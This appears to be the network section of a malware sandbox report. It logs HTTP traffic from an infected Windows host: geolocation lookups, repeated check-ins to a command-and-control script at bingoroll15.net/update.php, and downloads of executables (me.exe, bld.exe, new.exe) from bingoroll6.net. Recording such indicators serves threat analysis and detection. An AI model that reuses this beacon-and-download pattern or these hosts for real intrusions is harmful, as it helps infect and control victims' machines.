Network Analysis

GET /geoip HTTP/1.1 Host: api.ip.sb Connection: Keep-Alive

HTTP/1.1 200 OK Date: Mon, 23 Aug 2021 03:11:26 GMT Content-Type: application/json; charset=utf-8 Content-Length: 347 Connection: keep-alive Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: no-cache Access-Control-Allow-Origin: * CF-Cache-Status: DYNAMIC Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=klyt%2FUiLH045o5MOra78xfileIVYLDqPYSxp8dE3uf52NSV4GtT%2FdetCLGj6RasbmJOshbIU7%2Bajx51XBn980nRt2aMVvHxn25FE262ooUGOupADTgOwN7hHVw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Server: cloudflare CF-RAY: 6831274b2d360ccf-LAX alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400

GET /geoip HTTP/1.1 Host: api.ip.sb Connection: Keep-Alive

HTTP/1.1 200 OK Date: Mon, 23 Aug 2021 03:12:25 GMT Content-Type: application/json; charset=utf-8 Content-Length: 347 Connection: keep-alive Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: no-cache Access-Control-Allow-Origin: * CF-Cache-Status: DYNAMIC Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=c8UYaa8vzdGrTz0Gn9Ay8u0n8k5y73QsLMAVy9L%2B%2BbzabAphqLZlI6IVMKFQEt82jgA%2F%2FrjjsoFDzhAxsc7sLNW6SR3pN3eTxORG8%2B016Lx7HmY0jMaIHtpoVQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Server: cloudflare CF-RAY: 683128bcc94342b1-LAX alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400

GET /update.php?id=315021678&stat=91e2f106dc042be7fe29ceda1c1236d8 HTTP/1.1 User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; Trident/5.0) Host: bingoroll15.net Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Date: Mon, 23 Aug 2021 03:10:54 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive x-powered-by: PHP/5.4.16 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=iziQyqgUqILW%2BrG8W%2Fo26KDy0%2FzIrx9U8hKvNdMca%2FeVJtu3ggrXQZYUTEo8a4KimI50UB1ZCICk%2BrD6mgcLnltohTZx654nlCCKoLca7i0%2Fc%2Fs8%2FLsTpv1QmQdkfmoAEjA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 683126885c6d3660-LAX alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400

GET /update.php?id=315021678&stat=91e2f106dc042be7fe29ceda1c1236d8 HTTP/1.1 User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; Trident/5.0) Host: bingoroll15.net Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Date: Mon, 23 Aug 2021 03:11:05 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive x-powered-by: PHP/5.4.16 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gHjszeF7CaHpM3k5ZNuW8RvgApvwgGT05M7LhFJumnBVq4wbsQ55A%2FE0D2lw0HMse7JMiAOdY5XRTOoBWF8YFL9PWyMjkqFkfyY0mH4kZ9jP07xVuV8%2FzvN4lwpcJFbVXsM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 683126c8f9d13660-LAX alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400

GET /me.exe HTTP/1.1 User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; Trident/5.0) Host: bingoroll6.net Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Date: Mon, 23 Aug 2021 03:11:06 GMT Content-Type: application/octet-stream Content-Length: 123904 Connection: keep-alive last-modified: Wed, 11 Aug 2021 00:52:06 GMT etag: "61131f36-1e400" Cache-Control: max-age=14400 CF-Cache-Status: MISS Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gCajDOtmkwYs9wy1QCMwWI%2FPsh4e66SAegY%2BeDp3y1GZc%2FNnN0BgMM7jgYTBDUV4SZwu%2FvSAK3gtcF34CY1Mp8MZIQFIoakozyuSLFvR81Y29%2FDDWe8Tg9Kzh3oq1GmFuQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 683126cb58750ac6-KIX alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400

GET /update.php?id=315021678&stat=91e2f106dc042be7fe29ceda1c1236d8&cmd=1 HTTP/1.1 User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; Trident/5.0) Host: bingoroll15.net Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Date: Mon, 23 Aug 2021 03:11:07 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive x-powered-by: PHP/5.4.16 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=z%2FTPo1fg2Cl6D1Mvg%2B6te5ilwKad0PKAhR8XjZ6NUQwqgzk6uDwkd%2FmceVbS%2Bt9utNpwgmlJ1Ay7Q%2BChvH%2BgUMKKSlrtjp9Jc5y%2FnUkfo4DcME9cX5RQvCo11vn4Sbc8qZg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 683126d6fce63660-LAX alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400

GET /update.php?id=315021678&stat=91e2f106dc042be7fe29ceda1c1236d8 HTTP/1.1 User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; Trident/5.0) Host: bingoroll15.net Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Date: Mon, 23 Aug 2021 03:11:17 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive x-powered-by: PHP/5.4.16 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Rp1OdmJfT5KBRaZpSdMtaipCG%2FQAT2VFhgmxuvvzm4B5H5SMbgl89dOp3srSSlX3rN1BgDiNWvSTKTiL%2B4gD0zxO1OKgMaKghl2%2FelsWY8b01HMuLxr1uUKkCmWOq19zdYE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 683127178a453660-LAX alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400

GET /bld.exe HTTP/1.1 User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; Trident/5.0) Host: bingoroll6.net Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Date: Mon, 23 Aug 2021 03:11:20 GMT Content-Type: application/octet-stream Content-Length: 214470 Connection: keep-alive last-modified: Sun, 08 Aug 2021 14:36:57 GMT etag: "610fec09-345c6" Cache-Control: max-age=14400 CF-Cache-Status: MISS Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LtLabNP2Ln7A27a854t0Zd3mp08YSz67Qf6PNdC9GhEIJ6E6Z0tPTQHdDFMY%2F%2B4J2pqQhbwFWspEMxzllapde6r7wH7gnva7slLpsNNJtpLsUpQ55aK%2BJf3bcK2GBIM%2BqA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 68312719580a0ac6-KIX alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400

GET /update.php?id=315021678&stat=91e2f106dc042be7fe29ceda1c1236d8&cmd=1 HTTP/1.1 User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; Trident/5.0) Host: bingoroll15.net Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Date: Mon, 23 Aug 2021 03:11:23 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive x-powered-by: PHP/5.4.16 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VSvqfpk%2B7qeXc9L0Wy2fJzb4NVu3r7zW0AFgtVdsY4Dt%2FYbeqa0Pd%2FoaSDJJkrN%2B4nSFMPa1vYy1MWefH8rGcfW%2F9dn1Sdo5VICJE11b6mCv6mZ2slrbbF1TouYp%2BpLwM08%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6831273c4e963660-LAX alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400

GET /update.php?id=315021678&stat=91e2f106dc042be7fe29ceda1c1236d8 HTTP/1.1 User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; Trident/5.0) Host: bingoroll15.net Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Date: Mon, 23 Aug 2021 03:11:34 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive x-powered-by: PHP/5.4.16 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=msUZeQG3kIGjVR7EXo%2FvCHQ8PJhrneJx0l1iHgeZsYFXbfGJ5Fqk1zUeppx7P2dv1WGYSWj0vYNfgJe7gZv1GRPibC%2F6c970k2i%2Bs8EhuiSddfuqnVDDW2k%2F19wRYkNhc%2BY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6831277cef713660-LAX alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400

GET /new.exe HTTP/1.1 User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; Trident/5.0) Host: bingoroll6.net Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Date: Mon, 23 Aug 2021 03:11:35 GMT Content-Type: application/octet-stream Content-Length: 3395224 Connection: keep-alive last-modified: Sun, 22 Aug 2021 08:22:02 GMT etag: "6122092a-33ce98" Cache-Control: max-age=14400 CF-Cache-Status: MISS Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rG5Svkk5jRFEsJf4o%2F5wZ9ifjsKpj%2BAioplCp7sjl8DGLVXBj4ygAz3auwTA3%2FYo8xEnhPtme9vjQ%2FPAoMu7aYye%2Bm3YY49BMMqm%2FpUrVReQtnL46zIys2HsqWZUP2QRDA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6831277eabb70ac6-KIX alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400

GET /update.php?id=315021678&stat=91e2f106dc042be7fe29ceda1c1236d8&cmd=1 HTTP/1.1 User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; Trident/5.0) Host: bingoroll15.net Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Date: Mon, 23 Aug 2021 03:12:16 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive x-powered-by: PHP/5.4.16 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=B5%2FPJ7wa2PoitVfiYyV018i3yFRrH7ZZxxRL3H2HVc3LxAEkhFPyApDmXsi4D8O%2Bm4mpKZAn8uCdG8pWSkH6PDhRlmMuiTwI6yWPzNu8dTh0GmHv5jD6RgQaplyzfLTxEus%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6831288768223660-LAX alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400

GET /update.php?id=315021678&stat=91e2f106dc042be7fe29ceda1c1236d8 HTTP/1.1 User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; Trident/5.0) Host: bingoroll15.net Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Date: Mon, 23 Aug 2021 03:12:27 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive x-powered-by: PHP/5.4.16 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TTy%2FAcVnutUlrYjhGr9Qqtq1aRU%2FZ87vlP8weAjE%2FVpurqgq%2FNcxlxSDOBaiF5wuOpIW9dSLTWLKBPZzGECX%2FLSTES1gevxS8c8InJywBlbs4CjIDaFHuSkmc9xUiZmw05w%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 683128c83ae83660-LAX alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400